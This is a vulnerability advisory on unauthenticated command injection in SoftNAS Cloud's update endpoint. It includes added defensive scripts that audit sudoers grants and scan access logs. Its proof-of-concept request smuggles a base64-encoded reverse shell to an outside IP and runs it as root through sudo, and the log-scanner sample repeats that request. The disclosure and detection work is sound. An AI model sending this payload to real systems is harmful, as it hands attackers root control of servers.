**CVSS2:** AV:N/AC:L/Au:N/C:C/I:C/A:C (Attack Vector: NETWORK; Attack Complexity: LOW; Authentication: NONE; Confidentiality Impact: COMPLETE; Integrity Impact: COMPLETE; Availability Impact: COMPLETE)
**CVSS3:** CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH)
**EPSS Percentile:** 98.0%
**Title:** SoftNAS Cloud OS Command Injection
**Advisory ID:** CORE-2018-0009
**Advisory URL:** <https://www.coresecurity.com/core-labs/advisories/softnas-cloud-os-command-injection>
**Date published:** 2018-07-26
**Date of last update:** 2018-07-26
**Vendors contacted:** SoftNAS
**Release mode:** Coordinated release
**Class:** Improper Neutralization of Special Elements used in an OS Command [CWE-78]
**Impact:** Code execution
**Remotely Exploitable:** Yes
**Locally Exploitable:** Yes
**CVE Name:** CVE-2018-14417
SoftNAS’ website states that:
[1] SoftNAS Cloud is a software-defined NAS filer delivered as a virtual storage appliance that runs within public, private or hybrid clouds. SoftNAS Cloud provides enterprise-grade NAS capabilities, including encryption, snapshots, rapid rollbacks, and cross-zone high-availability with automatic failover.
A command injection vulnerability was found in the web administration console. In particular, the snserv script did not sanitize some input parameters before using them in a system command.
Other products and versions might be affected, but they were not tested.
SoftNAS released SoftNAS Cloud 4.0.3 that addresses the reported vulnerability. The software update can be performed via the StorageCenter admin UI in the product. For more information on the updating process see: https://www.softnas.com/docs/softnas/v3/html/updating_to_the_latest_version.html.
In addition, SoftNAS published the following release note: https://docs.softnas.com/display/SD/Release+Notes
The vulnerability was discovered and researched by Fernando Díaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
[CVE-2018-14417] The 'recentVersions' parameter of the snserv endpoint is vulnerable to OS command injection when the check-update and execute-update operations are performed. The endpoint performs no authentication or session verification, so an unauthenticated attacker can execute arbitrary code on the target server. Because the web server runs as a sudoer account (apache), that code runs with root permissions.
The following part of the /etc/sudoers file shows the apache user's capabilities:

```
User_Alias APACHE = apache
# Once SoftNAS UI is operational, only allow the specific command that require sudo access!!
Cmnd_Alias SOFTNAS = ALL
APACHE ALL = (ALL) NOPASSWD: SOFTNAS
```
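The alias above resolves to ALL, so the web-server account can run any command as root without a password. The following script, an added example that is not SoftNAS or Core Security code, parses a sudoers fragment of the shape quoted above and reports such grants for a given account. It is paired with a hypothetical tightened fragment (the command path is a placeholder) to show what the check should pass; the parser handles only the directive forms present in the advisory's fragment.

```python
"""Audit a sudoers fragment for accounts that may run any command as root
without a password. Added example, not SoftNAS or Core Security code; the
parser covers only the directive forms in the advisory's fragment (User_Alias,
Cmnd_Alias, comments, and 'USER HOST = (RUNAS) TAG: CMD' rules)."""
import re

# Constructed sample: the fragment quoted in the advisory.
SAMPLE_SUDOERS = """\
User_Alias APACHE = apache
# Once SoftNAS UI is operational, only allow the specific command that require sudo access!!
Cmnd_Alias SOFTNAS = ALL
APACHE ALL = (ALL) NOPASSWD: SOFTNAS
"""

# Hypothetical tightened version for comparison: the alias names one specific
# command (placeholder path, not a real SoftNAS binary) instead of ALL.
SAMPLE_RESTRICTED = """\
User_Alias APACHE = apache
Cmnd_Alias SOFTNAS = /usr/local/bin/softnas-update --check
APACHE ALL = (ALL) NOPASSWD: SOFTNAS
"""

# USER HOST = (RUNAS) TAG: COMMANDS ; the runas and tag parts are optional.
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def _alias_body(line, keyword):
    """Split 'Keyword NAME = a, b' into ('NAME', ['a', 'b'])."""
    name, members = line[len(keyword):].split("=", 1)
    return name.strip(), [m.strip() for m in members.split(",")]

def parse_sudoers(text):
    """Return (user_aliases, cmd_aliases, rules) from a sudoers fragment."""
    user_aliases, cmd_aliases, rules = {}, {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # strip comments and whitespace
        if not line:
            continue
        if line.startswith("User_Alias"):
            name, members = _alias_body(line, "User_Alias")
            user_aliases[name] = members
        elif line.startswith("Cmnd_Alias"):
            name, members = _alias_body(line, "Cmnd_Alias")
            cmd_aliases[name] = members
        else:
            m = RULE_RE.match(line)
            if m:
                rules.append(m.groupdict())
    return user_aliases, cmd_aliases, rules

def unrestricted_root_grants(text, account):
    """Rules that let `account` run ALL commands as root with NOPASSWD.
    An empty list means the fragment holds no such grant."""
    user_aliases, cmd_aliases, rules = parse_sudoers(text)
    findings = []
    for r in rules:
        users = user_aliases.get(r["who"], [r["who"]])
        if account not in users:
            continue
        runas = (r["runas"] or "root").strip()   # sudo defaults to root
        if runas.split(":")[0].strip() not in ("ALL", "root"):
            continue
        cmds = []
        for c in r["cmds"].split(","):
            cmds.extend(cmd_aliases.get(c.strip(), [c.strip()]))
        if "ALL" in cmds and "NOPASSWD" in r["tags"]:
            findings.append({"rule": r["who"], "runas": runas, "cmds": cmds})
    return findings

if __name__ == "__main__":
    print("advisory fragment:", unrestricted_root_grants(SAMPLE_SUDOERS, "apache"))
    print("tightened fragment:", unrestricted_root_grants(SAMPLE_RESTRICTED, "apache"))
```

The check resolves aliases before judging a rule, because the dangerous ALL in the quoted fragment sits in the Cmnd_Alias line rather than in the rule itself; a grep for "NOPASSWD: ALL" would miss it.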
The following proof of concept generates a remote shell on the target system as root:
```
GET /softnas/snserver/snserv.php?opcode=checkupdate&opcode=executeupdate&selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&update_type=standard&recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash; HTTP/1.1
Host: 10.2.45.208
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.208/softnas/applets/update/
X-Requested-With: XMLHttpRequest
Connection: close
```
As the request above shows, the payload had to be base64-encoded because some special characters were not being decoded properly by the endpoint.
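Two checks a defender can run against this request, added here as an example and not part of the advisory or the product: a strict allow-list for version-shaped parameters (the regex is an assumption about what the parameter legitimately carries), and a scan over constructed Apache combined-format access-log lines, one of which carries the request quoted above, that flags snserv.php requests whose parameters fail the allow-list or contain shell metacharacters. The query parser is hand-written so that a ';' inside a value is preserved regardless of the Python version's parse_qs defaults.

```python
"""Defender-side checks for the snserv 'recentVersions' parameter.
Added example, not SoftNAS or Core Security code. The version allow-list
and the Apache combined log format are assumptions; the injected request
is the one quoted in the advisory, embedded in constructed log lines."""
import re
from urllib.parse import urlsplit, unquote_plus

# Allow-list: digits separated by dots and nothing else (assumption about the
# legitimate shape of the parameter). Anything else is rejected before it can
# reach a shell.
VERSION_RE = re.compile(r"^\d+(?:\.\d+){0,3}$")
# Characters that terminate or chain a shell command, redirect, or substitute.
SHELL_META = set(";|&`$<>\n\r")
# Parameters from the request that the advisory shows being passed along.
SUSPECT_PARAMS = ("recentVersions", "selectedupdate")

# Apache combined format, only the fields the scan needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Request target exactly as quoted in the advisory's proof of concept.
POC_TARGET = (
    "/softnas/snserver/snserv.php?opcode=checkupdate&opcode=executeupdate"
    "&selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&update_type=standard"
    "&recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8x"
    "MC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash;"
)

# Constructed access-log lines: a benign update check, the proof-of-concept
# request, and an unrelated page load.
SAMPLE_LOG = [
    '10.2.45.185 - - [26/Jul/2018:10:00:01 +0000] "GET /softnas/snserver/snserv.php'
    '?opcode=checkupdate&recentVersions=3.6.1 HTTP/1.1" 200 512',
    '10.2.45.185 - - [26/Jul/2018:10:00:07 +0000] "GET ' + POC_TARGET + ' HTTP/1.1" 200 77',
    '10.2.45.190 - - [26/Jul/2018:10:01:00 +0000] "GET /softnas/applets/update/ HTTP/1.1" 200 3100',
]

def is_valid_version(value):
    """True only for a bare dotted version such as 4.0.3."""
    return bool(VERSION_RE.match(value))

def has_shell_meta(value):
    """True if the value could end or extend a shell command line."""
    return any(ch in SHELL_META for ch in value)

def parse_query(target):
    """Split a request target's query on '&' only and URL-decode each side."""
    params = {}
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        key, _, val = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(val))
    return params

def scan_log(lines):
    """One finding per suspicious parameter on each request to snserv.php."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not urlsplit(m.group("target")).path.endswith("/snserv.php"):
            continue
        params = parse_query(m.group("target"))
        for name in SUSPECT_PARAMS:
            for value in params.get(name, []):
                meta = has_shell_meta(value)
                if meta or not is_valid_version(value):
                    findings.append({"ip": m.group("ip"), "param": name,
                                     "shell_meta": meta, "value": value[:40]})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run over the sample, the benign check passes, the unrelated page is skipped, and the proof-of-concept request yields two findings: recentVersions (shell metacharacters present) and selectedupdate (letters where only digits and dots belong). The same allow-list is what the server side should apply before the value is used in any command, with rejection rather than escaping as the outcome.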
[1] <https://www.softnas.com>
CoreLabs, the research center of Core Security, a Fortra company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team comprises seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners so that a fix can be released efficiently and customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.
Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
The contents of this advisory are copyright © 2018 Core Security and © 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>